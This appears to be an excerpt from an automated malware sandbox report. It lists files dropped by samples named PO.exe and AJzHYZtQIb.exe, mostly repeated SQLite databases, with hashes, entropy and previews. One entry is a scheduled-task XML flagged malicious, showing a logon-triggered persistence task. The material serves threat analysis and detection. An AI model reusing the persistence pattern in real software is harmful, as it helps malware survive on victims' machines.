                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1583
                      Entropy (8bit):5.11800490128808
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                      MD5:1CA22DCFBADB6107577BDA22B32BD86C
                      SHA1:69BE9304F80294A061CB43DDDD505BB4C09ABBA9
                      SHA-256:F3B7B692FA1DA9406F506EA7728E20E9094D6CE13F829D361F78189BCEDAA573
                      SHA-512:36D5DB6D5A980A1C60D98A12C9407FB7B28B95FCB285D10D9DA3222C72C5BF4523E864FD394371320A13185D1F1A96A0A1F33B9610169E233F05A9ECD595CC58
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1583
                      Entropy (8bit):5.11800490128808
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                      MD5:1CA22DCFBADB6107577BDA22B32BD86C
                      SHA1:69BE9304F80294A061CB43DDDD505BB4C09ABBA9
                      SHA-256:F3B7B692FA1DA9406F506EA7728E20E9094D6CE13F829D361F78189BCEDAA573
                      SHA-512:36D5DB6D5A980A1C60D98A12C9407FB7B28B95FCB285D10D9DA3222C72C5BF4523E864FD394371320A13185D1F1A96A0A1F33B9610169E233F05A9ECD595CC58
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696178193607948
                      Encrypted:false
                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                      MD5:960ECA5919CC00E1B4542A6E039F413E
                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                      Malicious:false
